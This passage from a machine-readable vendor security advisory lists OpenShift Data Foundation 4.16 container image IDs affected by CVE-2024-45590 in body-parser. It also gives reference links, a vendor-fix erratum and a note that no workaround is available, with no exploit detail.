"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
